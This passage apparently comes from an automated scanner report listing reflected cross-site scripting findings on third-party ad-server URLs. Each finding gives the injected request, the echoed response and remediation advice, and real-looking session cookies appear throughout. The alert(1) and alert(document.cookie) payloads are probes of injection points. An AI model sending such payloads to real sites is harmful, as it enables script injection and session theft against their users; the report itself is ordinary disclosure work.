^1305035296^1305037096; path=/; expires=Tue, 10-May-11 14:18:16 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|51134|57094|60740|50085|50086|57130|50963|60491|60512|51186|56281|53380|60489|60515|57149|52615|60490|53656|55401|50507|60506|54255|57144|60509|54243|51182|50961|54209|56419|52576|56969|56835|56780|57372|56761; expires=Fri, 04-May-12 13:48:16 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:aff3a0d34f874c485c6aff040641c190,e93692b4245f9caf3a3a6cab8d3d53be; expires=Fri, 04-May-12 13:48:16 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTcwOTQ6NjA3NDA6NTAwODU6NTAwODY6NTcxMzA6NTA5NjM6NjA0OTE6NjA1MTI6NTExODY6NTYyODE6NTMzODA6NjA0ODk6NjA1MTU6NTcxNDk6NTI2MTU6NjA0OTA6NTM2NTY6NTU0MDE6NTA1MDc6NjA1MDY6NTQyNTU6NTcxNDQ6NjA1MDk6NTQyNDM6NTExODI6NTA5NjE6NTQyMDk6NTY0MTk6NTI1NzY=; expires=Fri, 04-May-12 13:48:16 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|51134|57094|60740|50085|50086|57130|50963|60491|60512|51186|56281|53380|60489|60515|57149|52615|60490|53656|55401|
...[SNIP]...

4. Cross-site scripting (reflected)
There are 398 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://a.collective-media.net/ad/q1.philly/news [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /ad/q1.philly/news

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2b6c3<script>alert(1)</script>c99cf9118d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad2b6c3<script>alert(1)</script>c99cf9118d4/q1.philly/news;sz=728x90;click0=;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html?ef135%27%3balert(document.cookie)//4b169261d24=1
Cookie: JY57=3kJqRfVWIsliNzmh12p72Uiw-sYF7o0ex_JQsPY6aZLx62OOd4kyhMQ; cli=11fda490648f83c; dc=dc; nadp=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Content-Type: text/html
Content-Length: 115
Vary: Accept-Encoding
Date: Tue, 10 May 2011 14:20:06 GMT
Connection: close

unknown path /ad2b6c3<script>alert(1)</script>c99cf9118d4/q1.philly/news;cmw=nurl;sz=728x90;click0=;ord=[timestamp]

4.2. http://a.collective-media.net/adj/idgt.slashgear/article_above [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/idgt.slashgear/article_above

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70ecd'-alert(1)-'b92e5d76854 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/idgt.slashgear70ecd'-alert(1)-'b92e5d76854/article_above;sec=article;fold=above;tile=1;sz=728x90;ord=8260554892476648? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 493
Date: Tue, 10 May 2011 13:36:17 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:36:17 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/idgt.slashgear70ecd'-alert(1)-'b92e5d76854/article_above;sec=article;fold=above;tile=1;sz=728x90;net=idgt;ord=8260554892476648;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.3. http://a.collective-media.net/adj/idgt.slashgear/article_above [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/idgt.slashgear/article_above

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2160e'-alert(1)-'33e66250cd2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/idgt.slashgear/article_above2160e'-alert(1)-'33e66250cd2;sec=article;fold=above;tile=1;sz=728x90;ord=8260554892476648? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 493
Date: Tue, 10 May 2011 13:36:21 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:36:21 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/idgt.slashgear/article_above2160e'-alert(1)-'33e66250cd2;sec=article;fold=above;tile=1;sz=728x90;net=idgt;ord=8260554892476648;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.4. http://a.collective-media.net/adj/idgt.slashgear/article_above [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/idgt.slashgear/article_above

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c976'-alert(1)-'4e5e9bb4060 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/idgt.slashgear/article_above;sec=article;fold=above;tile=1;sz=728x90;ord=8260554892476648?&7c976'-alert(1)-'4e5e9bb4060=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 497
Date: Tue, 10 May 2011 13:36:10 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:36:10 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/idgt.slashgear/article_above;sec=article;fold=above;tile=1;sz=728x90;net=idgt;ord=8260554892476648?&7c976'-alert(1)-'4e5e9bb4060=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.5. http://a.collective-media.net/adj/idgt.slashgear/article_above [sec parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/idgt.slashgear/article_above

Issue detail

The value of the sec request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd8ab'-alert(1)-'a2aff8f33cb was submitted in the sec parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/idgt.slashgear/article_above;sec=article;fold=above;tile=1;sz=728x90;ord=8260554892476648?bd8ab'-alert(1)-'a2aff8f33cb HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 494
Date: Tue, 10 May 2011 13:35:33 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:35:33 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/idgt.slashgear/article_above;sec=article;fold=above;tile=1;sz=728x90;net=idgt;ord=8260554892476648?bd8ab'-alert(1)-'a2aff8f33cb;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.6. http://a.collective-media.net/adj/ns.androidcentral/general [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.androidcentral/general

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb074'-alert(1)-'086f2a8c269 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.androidcentralcb074'-alert(1)-'086f2a8c269/general;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;ord=%202250960881356150? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc; blue=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 491
Date: Tue, 10 May 2011 13:34:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:34:03 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.androidcentralcb074'-alert(1)-'086f2a8c269/general;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;net=ns;ord=%202250960881356150;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.7. http://a.collective-media.net/adj/ns.androidcentral/general [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.androidcentral/general

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd302'-alert(1)-'751a437e7b3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.androidcentral/generalcd302'-alert(1)-'751a437e7b3;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;ord=%202250960881356150? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc; blue=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 491
Date: Tue, 10 May 2011 13:34:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:34:06 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.androidcentral/generalcd302'-alert(1)-'751a437e7b3;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;net=ns;ord=%202250960881356150;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.8. http://a.collective-media.net/adj/ns.androidcentral/general [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.androidcentral/general

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 357aa'-alert(1)-'b8febab7243 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.androidcentral/general;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;ord=%202250960881356150?&357aa'-alert(1)-'b8febab7243=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc; blue=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 495
Date: Tue, 10 May 2011 13:33:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:33:57 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.androidcentral/general;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;net=ns;ord=%202250960881356150?&357aa'-alert(1)-'b8febab7243=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.9. http://a.collective-media.net/adj/ns.androidcentral/general [ppos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.androidcentral/general

Issue detail

The value of the ppos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8006'-alert(1)-'5f898280ebd was submitted in the ppos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.androidcentral/general;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;ord=%202250960881356150?d8006'-alert(1)-'5f898280ebd HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc; blue=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 492
Date: Tue, 10 May 2011 13:33:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:33:20 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.androidcentral/general;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;net=ns;ord=%202250960881356150?d8006'-alert(1)-'5f898280ebd;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.10. http://a.collective-media.net/adj/ns.androidcentral/general/archive [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.androidcentral/general/archive

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be56e'-alert(1)-'77633cd5bb4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.androidcentralbe56e'-alert(1)-'77633cd5bb4/general/archive;ppos=btf;kw=;tile=2;sz=300x250,336x280;ord=2250960881356150? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 495
Date: Tue, 10 May 2011 13:36:32 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:36:32 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.androidcentralbe56e'-alert(1)-'77633cd5bb4/general/archive;ppos=btf;kw=;tile=2;sz=300x250,336x280;net=ns;ord=2250960881356150;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.11. http://a.collective-media.net/adj/ns.androidcentral/general/archive [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.androidcentral/general/archive

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c26ad'-alert(1)-'dab6a35d7c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.androidcentral/generalc26ad'-alert(1)-'dab6a35d7c9/archive;ppos=btf;kw=;tile=2;sz=300x250,336x280;ord=2250960881356150? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 495
Date: Tue, 10 May 2011 13:36:33 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:36:33 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.androidcentral/generalc26ad'-alert(1)-'dab6a35d7c9/archive;ppos=btf;kw=;tile=2;sz=300x250,336x280;net=ns;ord=2250960881356150;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.12. http://a.collective-media.net/adj/ns.androidcentral/general/archive [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.androidcentral/general/archive

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f21e'-alert(1)-'99f2e7ff was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

